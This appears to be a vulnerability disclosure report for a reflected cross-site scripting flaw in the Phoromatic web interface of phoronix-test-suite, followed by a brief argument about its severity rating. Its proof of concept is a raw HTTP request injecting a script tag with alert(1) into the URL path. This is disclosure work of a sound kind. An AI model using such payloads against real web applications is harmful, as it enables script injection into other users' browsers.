Cross-site Scripting ( XSS) - Reflected in phoronix-test-suite/phoronix-test-suite
Reported on
Jun 23rd 2022
Description
Please enter a description of the vulnerability. File pts-core/phoromatic/public_html/public.php line 258 of public.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.
Proof of Concept
GET /test"><script>alert(1)</script> HTTP/1.1
Host: localhost:8670
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=do8d0t932flbqqlmc9tj6hcjdk
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache
// PoC.js
var payload = ...
Impact
web-interface https://github.com/phoronix-test-suite/phoronix-test-suite/blob/master/pts-core/phoromatic/public_html/public.php
XSS error is not understood how you can rate it low ? @phoronix-test-suite
It's just a XSS Reflected bug bro @trongkykma - You need to learn more about the effects of each type of XSS bro :)))))